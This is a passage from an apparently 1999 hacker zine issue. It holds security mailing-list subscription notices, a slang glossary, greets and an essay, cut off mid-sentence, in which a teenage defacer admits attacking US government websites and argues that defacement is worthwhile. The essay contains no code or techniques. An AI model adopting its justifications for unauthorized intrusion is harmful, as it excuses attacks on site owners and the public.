      personell charged with tracking security incidents on
      government run networks. Further, it is designed for 
      quick response and aimed at law enforcement agencies like
      DCIS and the FBI.
      
      To subscribe to this list, a special mail will be sent to YOUR
      alpha-numeric pager. A specific response must be made within
      12 hours of receiving the mail to be subscribed. If the response
      is not received, it is assumed the mail was not sent to your 
      pager.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
         
      
    -=-     
      

    


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin . To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

          

    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list`s charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
    "CC" the bugtraq reflector address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words that you post on this list and that
    reproduction of those words without your permission in any medium outside the distribution of this list may be
     challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)
    
    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

      I am pleased to inform you of several changes that will be occurring
      on June 5th. I hope you find them as exciting as I do.
      
      
      BUGTRAQ moves to a new home
      ---------------------------
      
      
      First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
      to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
      below. Other than the change of domains nothing of how the list
      is run changes. I am still the moderator. We play by the same rules.
      
      
      Security Focus will be providing mail archives for BUGTRAQ. The
      archives go back longer than Netspace's and are more complete than
      Geek-Girl's.
      
      
      The move will occur one week from today. You will not need to
      resubscribe. All your information, including subscription options
      will be moved transparently.
      
      
      Any of you using mail filters (e.g. procmail) to sort incoming
      mail into mail folders by examining the From address will have to
      update them to include the new address. The new address will be:
      
      
                            BUGTRAQ@SECURITYFOCUS.COM
      
      
      Security Focus also be providing a free searchable vulnerability
      database.
      
      
      BUGTRAQ es muy bueno
      --------------------
      
      
      It has also become apparent that there is a need for forums
      in the spirit of BUGTRAQ where non-English speaking people
      or people that don't feel comfortable speaking English can
      exchange information.
      
      
      As such I've decided to give BUGTRAQ in other languages a try.
      BUGTRAQ will continue to be the place to submit vulnerability
      information, but if you feel more comfortable using some other
      language you can give the other lists a try. All relevant information
      from the other lists which have not already been covered here
      will be translated and forwarded on by the list moderator.
      
      
      In the next couple of weeks we will be introducing BUGTRAQ-JP
      (Japanese) which will be moderated by Nobuo Miwa 
      and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
      from Argentina  (the folks that brought you
      Secure Syslog and the SSH insertion attack).
      
      
      What is Security Focus?
      -----------------------
      
      
      Security Focus is an exercise in creating a community and a security
      resource. We hope to be able to provide a medium where useful and
      successful resources such as BUGTRAQ can occur, while at the same
      time providing a comprehensive source of security information. Aside
      from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
      herself!) have moved over to Security Focus to help us with building
      this new community. The other staff at Security Focus are largely derived
      from long time supporters of Bugtraq and the community in general. If
      you are interested in viewing the staff pages, please see the 'About'
      section on www.securityfocus.com.
      
      
      On the community creating front you will find a set of forums
      and mailing lists we hope you will find useful. A number of them
      are not scheduled to start for several weeks but starting today
      the following list is available:
      
      
      * Incidents' Mailing List. BUGTRAQ has always been about the
         discussion of new vulnerabilities. As such I normally don't approve
         messages about break-ins, trojans, viruses, etc with the exception
         of wide spread cases (Melissa, ADM worm, etc). The other choice
         people are usually left with is email CERT but this fails to
         communicate this important information to other that may be
         potentially affected.
      
      
         The Incidents mailing list is a lightly moderated mailing list to
         facilitate the quick exchange of security incident information.
         Topical items include such things as information about rootkits
         new trojan horses and viruses, source of attacks and tell-tale
         signs of intrusions.
      
      
         To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
         of:
      
      
                   SUBS INCIDENTS FirstName, LastName
      
      
      Shortly we'll also be introducing an Information Warfare forum along
      with ten other forums over the next two months. These forums will be
      built and moderated by people in the community as well as vendors who
      are willing to take part in the community building process.
      *Note to the vendors here* We have several security vendors who have
      agreed to run forums where they can participate in the online communities.
      If you would like to take part as well, mail Alfred Huger,
      ahuger@securityfocus.com.
      
      
      On the information resource front you find a large database of
      the following:
      
      
      * Vulnerabilities. We are making accessible a free vulnerability
         database. You can search it by vendor, product and keyword. You
         will find detailed information on the vulnerability and how to fix it,
         as well are links to reference information such as email messages,
         advisories and web pages. You can search by vendor, product and
         keywords. The database itself is the result of culling through 5
         years of BUGTRAQ plus countless other lists and news groups. It's
         a shining example of how thorough full disclosure has made a significant
         impact on the industry over the last half decade.
      
      
      * Products. An incredible number of categorized security products
         from over two hundred different vendors.
      
      
      * Services. A large and focused directory of security services offered by
         vendors.
      
      
      * Books, Papers and Articles. A vast number of categorized security
         related books, papers and articles. Available to download directly
         for our servers when possible.
      
      
      * Tools. A large array of free security tools. Categorized and
         available for download.
      
      
      * News: A vast number of security news articles going all the way
         back to 1995.
      
      
      * Security Resources: A directory to other security resources on
         the net.
      
      
      As well as many other things such as an event calendar.
      
      
      For your convenience the home-page can be personalized to display
      only information you may be interested in. You can filter by
      categories, keywords and operating systems, as well as configure
      how much data to display.
      
      
      I'd like to thank the fine folks at NETSPACE for hosting the
      site for as long as they have. Their services have been invaluable.
      
      
      I hope you find these changes for the best and the new services
      useful. I invite you to visit http://www.securityfocus.com/ and
      check it out for yourself. If you have any comments or suggestions
      please feel free to contact me at this address or at
      aleph1@securityfocus.com.
      
      
      Cheers.
      
      
      --
      Aleph One / aleph1@underground.org
      http://underground.org/
      KeyID 1024/948FD6B5
      Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
      



    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
      visit http://www.counterpane.com/unsubform.html. Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW. He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09

 ISSN 1004-042X

 Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
 News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
 Archivist: Brendan Kehoe
 Poof Reader: Etaion Shrdlu, Jr.
 Shadow-Archivists: Dan Carosone / Paul Southworth
 Ralph Sims / Jyrki Kuoppala
 Ian Dickinson
 Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed

    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
      
      --[ New ISN announcement (New!!)
      
      
      Sender:       ISN Mailing List 
      From:         mea culpa 
      Subject:      Where has ISN been?
      Comments: To: InfoSec News 
      To:           ISN@SECURITYFOCUS.COM
      
      
      It all starts long ago, on a network far away..
      
      
      Not really. Several months ago the system that hosted the ISN mail list
      was taken offline. Before that occured, I was not able to retrieve the
      subscriber list. Because of that, the list has been down for a while. I
      opted to wait to get the list back rather than attempt to make everyone
      resubscribe.
      
      
      As you can see from the headers, ISN is now generously being hosted by
      Security Focus [www.securityfocus.com]. THey are providing the bandwidth,
      machine, and listserv that runs the list now.
      
      
      Hopefully, this message will find all ISN subscribers, help us weed out
      dead addresses, and assure you the list is still here. If you have found
      the list to be valuable in the past, please tell friends and associates
      about the list. To subscribe, mail listserv@securityfocus.com with
      "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
      
      
      As usual, comments and suggestions are welcome. I apologize for the down
      time of the list. Hopefully it won't happen again. ;)
      
      
      
      mea_culpa
      www.attrition.org
      
      
      
      --[ Old ISN welcome message
      
      
      [Last updated on: Mon Nov  04  0:11:23 1998]
      
      
      InfoSec News is a privately run, medium traffic list that caters 
      to distribution of information security news articles. These 
      articles will come from newspapers, magazines, online resources, 
      and more.
      
      
      The subject line will always contain the title of the article, so that
      you may quickly and effeciently filter past the articles of no interest.
      
      
      This list will contain:
      
      
      o       Articles catering to security, hacking, firewalls, new security
              encryption, products, public hacks, hoaxes, legislation affecting
              these topics and more.
      
      
      o       Information on where to obtain articles in current magazines.
      
      
      o       Security Book reviews and information.
      
      
      o       Security conference/seminar information.
      
      
      o       New security product information.
      
      
      o       And anything else that comes to mind..
      
      
      Feedback is encouraged. The list maintainers would like to hear what
      you think of the list, what could use improving, and which parts
      are "right on". Subscribers are also encouraged to submit articles
      or URLs. If you submit an article, please send either the URL or
      the article in ASCII text. Further, subscribers are encouraged to give
      feedback on articles or stories, which may be posted to the list.
      
      
      Please do NOT:
      
      
              * subscribe vanity mail forwards to this list
      
      
              * subscribe from 'free' mail addresses (ie: juno, hotmail)
      
      
              * enable vacation messages while subscribed to mail lists
      
      
              * subscribe from any account with a small quota
      
      
      All of these generate messages to the list owner and make tracking
      down dead accounts very difficult. I am currently receiving as many 
      as fifty returned mails a day. Any of the above are grounds for
      being unsubscribed. You are welcome to resubscribe when you address
      the issue(s).
      
      
      Special thanks to the following for continued contribution:
              William Knowles, Aleph One, Will Spencer, Jay Dyson,
              Nicholas Brawn, Felix von Leitner, Phreak Moi and 
              other contributers.
      
      
      ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
      ISN Archive: http://www.landfield.com/isn
      ISN Archive: http://www.jammed.com/Lists/ISN/
      
      
      ISN is Moderated by 'mea_culpa' . ISN is a
          private list. Moderation of topics, member subscription, and
          everything else about the list is solely at his discretion.
      
      
      The ISN membership list is NOT available for sale or disclosure.  
      
      
      ISN is a non-profit list. Sponsors are only donating to cover bandwidth 
          and server costs. 
          
          
     Win2k Security Advice Mailing List (new added Nov 30th)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
      To subscribe:
      
      
      send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
      to  listserv@listserv.ntsecurity.net
      
     
      
      Welcome to Win2K Security Advice! Thank you for subscribing. If you have any
      questions or comments about the list please feel free to contact the list
      moderator, Steve Manzuik, at steve@win2ksecadvice.net.
      
      To see what you've missed recently on the list, or to research an item
      of interest, be sure to visit the Web-based archives located at:
      http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec
      
      ==============
      NTSecurity.net brings the security community a brand new (Oct 99) and
      much-requested Windows security mailing list. This new moderated mailing list,
      Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open
      discussion of Windows-related security issues.
      
      With a firm and unwavering commitment towards timely full disclosure, this
      new resource promises to become a great forum for open discussion
      regarding security-related bugs, vulnerabilities, potential exploits, virus,
      worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community
      and we openly invite all security minded individuals, be they white hat,
      gray hat, or black hat, to join the new mailing list.
      
      While Win2KSecAdvice was named in the spirit of Microsoft's impending product
      line name change, and meant to reflect the list's security focus both now and
      in the long run, it is by no means limited to security topics centered around
      Windows 2000. Any security issues that pertain to Windows-based networking are
      relevant for discussion, including all Windows operating systems, MS Office,
      MS BackOffice, and all related third party applications and hardware.
      
      The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to
      a security risk, it's relevant to the list.
      
      The list archives are available on the Web at http://www.ntsecurity.net,
      which include a List Charter and FAQ, as well as Web-based searchable list
      archives for your research endeavors.
      
      SAVE THIS INFO FOR YOUR REFERENCE:
      
      To post to the list simply send your email to
      win2ksecadvice@listserv.ntsecurity.net
      
      To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
      listserv@listserv.ntsecurity.net
      
      Regards,
      
      Steve Manzuik, List Moderator
      Win2K Security Advice
      steve@win2ksecadvice.net     

    



    @HWA


 00.3 THIS IS WHO WE ARE
      ~~~~~~~~~~~~~~~~~~
      
            __        ___                                      ___
            \ \      / / |__   ___   __ _ _ __ _____      ____|__ \
             \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
              \ V  V / | | | | (_) | (_| | | |  __/\ V  V /  __/_|
               \_/\_/  |_| |_|\___/ \__,_|_|  \___| \_/\_/ \___(_)

 
      Some HWA members and Legacy staff
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      cruciphux@dok.org.........: currently active/editorial
      darkshadez@ThePentagon.com: currently active/man in black
      fprophet@dok.org..........: currently active/programming/IRC+ man in black
      sas2@usa.net .............. currently active/IRC+ distribution
      vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
      dicentra...(email withheld): IRC+ grrl in black
      twisted-pair@home.com......: currently active/programming/IRC+


      Foreign Correspondants/affiliate members
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       Qubik ............................: United Kingdom 
       D----Y ...........................: USA/world media
       HWA members ......................: World Media
       
      
      
      Past Foreign Correspondants (currently inactive or presumed dead) 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Sla5h.............................: Croatia
       N0Portz ..........................: Australia           
       system error .....................: Indonesia           
       Wile (wile coyote) ...............: Japan/the East      
       Ruffneck  ........................: Netherlands/Holland 
       Wyze1.............................: South Africa

       
       Please send in your sites for inclusion here if you haven't already
       also if you want your emails listed send me a note ... - Ed

      Spikeman's site is down as of this writing, if it comes back online it will be
      posted here.
      
      http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
      
      Sla5h's email: smuddo@yahoo.com
       

       *******************************************************************
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************

    :-p


    1. We do NOT work for the government in any shape or form.Unless you count paying
       taxes ... in which case we work for the gov't in a BIG WAY. :-/

    2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
       events its a good idea to check out issue #1 at least and possibly also the
       Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


    @HWA



 00.4 Whats in a name? why HWA.hax0r.news??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pidgeon holed with those 'dumb
     leet (l33t?) dewds'  this is the state
     of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
     up  and comers, i'd highly recommend you get that book. Its almost
     like  buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
                    _   ___        ___      _____ _    ___
                   | | | \ \      / / \    |  ___/ \  / _ \
                   | |_| |\ \ /\ / / _ \   | |_ / _ \| | | |
                   |  _  | \ V  V / ___ \ _|  _/ ___ \ |_| |
                   |_| |_|  \_/\_/_/   \_(_)_|/_/   \_\__\_\
                     

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal useage and use in this zine are
    listed below: Some are very useful, others attempt to deny the any possible
    attempts at eschewing obfuscation by obsucuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour  also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN  - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same 
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking 
                      C - Cracking 
                      V - Virus
                      W - Warfare 
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
            from the underground masses. also "w00ten" 

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck, where the fuck, when the fuck etc ..

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
     @HWA            
     
     
                            -=-    :.    .:        -=-
                            
                            
                            

 01.0 Greets!?!?! yeah greets! w0w huh. - Ed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                           ____               _
                          / ___|_ __ ___  ___| |_ ___
                         | |  _| '__/ _ \/ _ \ __/ __|
                         | |_| | | |  __/  __/ |_\__ \
                          \____|_|  \___|\___|\__|___/


     Thanks to all in the community for their support and interest but i'd
     like to see more reader input, help me out here, whats good, what sucks
     etc, not that I guarantee i'll take any notice mind you, but send in
     your thoughts anyway.


       * all the people who sent in cool emails and support
       
     FProphet       Pyra                TwstdPair      _NeM_
     D----Y         Dicentra            vexxation      sAs72
     Spikeman       p0lix               Vortexia      Wyze1
     Pneuma         Raven               Zym0t1c       duro
     Repluzer       astral              BHZ           ScrewUp
     Qubik          gov-boi             _Jeezus_      Haze_
     thedeuce       ytcracker
     
     Folks from #hwa.hax0r,news and #fawkerz, #ninjachat and #sesame 
     
     
               
     Ken Williams/tattooman ex-of PacketStorm,
          
     & Kevin Mitnick                      
     
     kewl sites:
     
     + http://www.hack.co.za  NEW
     + http://blacksun.box.sk. NEW
     + http://packetstorm.securify.com/ NEW
     + http://www.securityportal.com/ NEW
     + http://www.securityfocus.com/ NEW
     + http://www.hackcanada.com/
     + http://www.l0pht.com/
     + http://www.2600.com/
     + http://www.freekevin.com/
     + http://www.genocide2600.com/
     + http://www.hackernews.com/ (Went online same time we started issue 1!)
     + http://www.net-security.org/
     + http://www.slashdot.org/
     + http://www.freshmeat.net/
     + http://www.403-security.org/
     + http://ech0.cjb.net/

     @HWA


 01.1 Last minute stuff, rumours and newsbytes
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       "What is popular isn't always right, and what is right isn't
         always popular..."
                           - FProphet '99
                           
       

    +++ When was the last time you backed up your important data?
    
     
 
          
     
      Thanks to myself for providing the info from my wired news feed and others from whatever
      sources, also to Spikeman for sending in past entries.... - Ed
      
     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
              
      Yeah we have a message board, feel free to use it, remember there are no stupid questions...
      well there are but if you ask something really dumb we'll just laugh at ya, lets give the
      message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
      domain comes back online (soon) meanwhile the beseen board is still up...
        
      
    
      ==============================================================================
      
      
      
      
      

      

 02.0 From the editor.
      ~~~~~~~~~~~~~~~~

     #include 
     #include 
     #include 

     main()
         {
           printf ("Read commented source!\n\n");

     /*
          * Short issue this week, i'm still sick 
          * so haven't put as much time as I usually do
          * into digging up info and etc, hopefully be
          * back to normal next week...
          * 
          */
           
     printf ("EoF.\n");
           }

      

      Congrats, thanks, articles, news submissions and kudos to us at the
         
      main address: hwa@press.usmc.net complaints and all nastygrams and
         
      mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
         
      127.0.0.1, private mail to cruciphux@dok.org

     danke.

     C*:.
     
     -= start =--= start =--= start =--= start =--= start =--= start =--= start 
   
     
                       ____            _             _
                      / ___|___  _ __ | |_ ___ _ __ | |_
                     | |   / _ \| '_ \| __/ _ \ '_ \| __|
                     | |__| (_) | | | | ||  __/ | | | |_
                      \____\___/|_| |_|\__\___|_| |_|\__|
                           / ___|| |_ __ _ _ __| |_
                           \___ \| __/ _` | '__| __|
                            ___) | || (_| | |  | |_
                           |____/ \__\__,_|_|   \__|

             
     
                            
      -= start =--= start =--= start =--= start =--= start =--= start =--= 
                         
     
     
     
     
03.0  Yes It Is (Worth It) 
      ~~~~~~~~~~~~~~~~~~~~

      contributed by ytcracker 
      Active web page defacer YTCracker has written an
      article in response to Brian Martin's article Is It Worth
      IT, published by HNN last week. Mr Martin asked if the
      recent spate of web page defacements was worth the
      trouble it causes the perpetrators. YTCracker has
      recently defaced such high profile pages as Bureau of
      Land Management National Training Center and the
      Defense Contracts Audit Agency. YTCracker now
      explains the motivation and says that, Yes, it is worth
      it. 

      Buffer Overflow
      http://www.hackernews.com/orig/buffero.html
      
      HNN Cracked Pages Archive - Some of YTCrackers work is displayed here. 
      http://www.hackernews.com/archive/crackarch.html
      
      
      "Yes, it is."


      A response to Brian Martin's Is it worth it? article. 

      By YTCracker (phed@felons.org) 



      This article was written in response to an article written
      by Brian Martin concerning web page defacement, its
      risks, and its consequences. He asks the eternal question
      "Is it worth it?" to those who participate in these kinds of
      activities. Many of the individuals I have talked to have
      mixed thoughts about the article. Some individuals say it
      really taught them something valuable. Some said it
      scared them into considering quitting. Others, including
      myself, carry a somewhat apathetic attitude toward the
      whole thing in general. Allow me to explain.

      A few things need to be established about this
      defacement culture. One, I believe that this in no way
      constitutes as hacking. On any level, no matter how you
      look at it, web page defacement is destructive. In some
      cases, it can ruin the credibility of a company or a
      government agency. Two, I believe that web page
      defacement should carry a "message". When I spoke with
      Brian earlier, I tried to make it clear that we [as third
      person onlookers to a defacement] cannot determine this
      message in some cases. To us, "hack0r x 0ens u in 9d9"
      probably means nothing at all. To hack0r x, it may have.
      However, I personally believe that if hack0r x is going to
      break into this page and disrupt their message, his better
      be worthwhile. Thirdly, I believe that there is a "whiter"
      side to defacement. This side operates within definitive
      ethical boundaries and attempts to make web page
      cracking as non-malicious as possible.

      I do my best to have the ability to define myself under
      this ethical side. I back everything up. I leave the
      administrator information on how to fix the security hole. I
      don't disrupt the flow of information - I leave a link to the
      original page in plain sight. While these factors don't
      guarantee my immunity, they surely aren't raising any
      eyebrows and leading people to contemplate my threat to
      national security. I am not concerned with leaving
      messages like "fuq da fedz in 9d9 suk0r my nutsaq." That,
      frankly, is asking for trouble. It also serves no purpose.

      Why do I do it? There are a few key reasons. I am sure
      that everyone out there that contributes to this scene
      has their own.

      First off, I am seventeen [before I go any further, I am
      referring to seventeen as "kid", not "a minor and therefore
      will receive lesser penalty"]. As a young member of
      society oftentimes I find that my voice goes unheard. In a
      book titled Rise and Fall of the American Teen by Thomas
      Hine [NPR broadcast] , the theory is presented that the
      proverbial "teenager" did not exist until the 1930s. Until
      that time, teenagers were too busy supporting the family,
      getting married, and having children. Nowadays, if I were
      to write my senator, correct my teacher, or start a
      business, people automatically assume that I am
      incapable. This is a stereotype that I have not established
      for myself; other teenagers have given me a reputation
      unbefitting of who I really am. By defacing a website,
      people have to listen. The volume of people that visit the
      site as it is defaced combined with the volume of people
      that view it mirrored is immense. Therefore, I have
      effectively gotten my message out, and people can
      choose to listen to it or not.

      If this sounds extremely selfish, I agree. The twist comes
      in the questions that people ask themselves. For instance,
      one of my motivations is enlightening system
      administrators. There has been many a case where I have
      noticed a vulnerablilty, mailed the admin, and his/her
      cockyness resulted in ignoring my warning. Two or three
      days later, I see this admin's page on the mirror.
      Sometimes, the best way to inform someone is to show
      them. Seeing is believing. The point is, if I can get at
      least one of the hundred people that see that site,
      including the administrator, to realize that security isn't all
      its cracked up to be and change their views, I have done
      my job. This line of thought is very common in the heads
      of most defacement practitioners.

      Second, I am a graffiti artist. I throw burners on walls and
      trains. I have ran with some infamous crews. I do not
      represent the "tagging" aspect [for the uninitiated, the
      equivalent of "b0n3r oenz u" on a defacement]. I strongly
      feel that graffiti can be very artistic and carry a very
      strong message if done correctly. People will pass by your
      piece and either love it or hate it. For that moment they
      take their mind off of their jobs, their children, their lives
      and they contemplate what they are looking at. This is
      very much so the purpose of web defacement in my eyes.

      Third, I don't care. I can't care. I haven't been raided,
      haven't stared down a lawman's gun, and haven't been
      investigated for computer crime. If any of these were to
      happen to me, I have no doubt in my mind I will see things
      in a different light. This ignorance is obviously not very
      healthy. I have weighed the consequences and see very
      little in favor of me stopping. I will most likely continue to
      deface until it gets old, I have nothing else to say, or
      simply don't have time. I would argue that ninety percent
      of web page defacements fall under this mindset. This is
      sad, but true. This is not to say that I or anyone else isn't
      aware of the rules. That assumption is far from the truth.
      What it means is that we are basically carefree in the
      sense that we could be arrested and still feel good about
      ourselves. ;)

      In a sense, it isn't worth it. There are only a few of us
      singlehandedly cracking with good intentions. The rest of
      the scene is too busy talking shit to each other or rm
      -rfing everything they can that there is a stereotype
      affiliated. As aforementioned, stereotypes are the ultimate
      backpedal to anything we accomplish. Just as teenagers
